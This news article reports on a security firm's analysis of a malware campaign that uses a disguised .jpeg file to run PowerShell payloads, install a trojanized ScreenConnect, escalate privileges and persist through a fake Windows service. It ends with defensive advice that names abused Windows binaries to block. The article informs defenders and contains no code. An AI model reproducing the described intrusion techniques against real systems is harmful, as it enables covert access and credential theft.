- The attackers weaponized a .jpeg file to deliver PowerShell payloads, trojanized ScreenConnect, and establish persistence.
- The malware enables credential theft, encrypted C2 communications, and surveillance functions.
- Cyfirma warns that the campaign reflects a mature intrusion framework
Be careful when downloading files from the Internet, as even innocent .jpeg files can contain malware, experts warned.
Security researchers Cyfirma released a detailed report on a new hacking campaign they dubbed “Operation SilentCanvas.” While we don’t know the number of infections or victims successfully compromised, researchers said the campaign likely targets businesses and other organizations that use remote administration tools.
The attack begins when the victim receives the assembled .jpeg file. Again, we don’t know the exact delivery mechanism, but Cyfirma speculates that the file is delivered via phishing emails with malicious attachments, deceptive file-sharing interactions, or fake software and update lures.
“Professionally designed and operationally mature intrusion framework”
In either case, when the victim executes the file, called ‘sysupdate.jpeg’, it actually executes a malicious PowerShell payload that does several things: downloads additional payloads from the attacker’s infrastructure; implements a trojanized version of ConnectWise ScreenConnect for covert remote access; bypasses Windows security protections and elevates privileges by adding malicious Registry entries; and establishes persistence through a fake Windows service called OneDriveServers.
The malware also enables encrypted communications with the command and control (C2) infrastructure, steals credentials, and fingerprints the system. Other supported features include screen capture, microphone capture, and clipboard monitoring.
“The overall art reflects a professionally designed and operationally mature intrusion framework capable of supporting long-term covert persistence, credential theft, lateral movement, enterprise espionage, and potential ransomware deployment within enterprise environments,” Cyfirma concluded, without naming the group or even linking it to a specific country or region.
To defend against this campaign, security experts should be on the lookout for commonly abused Windows binaries, including csc.exe, cvtres.exe, or ComputerDefaults.exe. If possible, these should be blocked completely. Remote access platforms should be strictly monitored and detection rules established for suspicious PowerShell behavior.
Finally, any system that displays unexpected ScreenConnect activity should be sealed immediately.
The best antivirus for all budgets
Follow TechRadar on Google News and add us as a preferred source to receive news, reviews and opinions from our experts in your feeds.
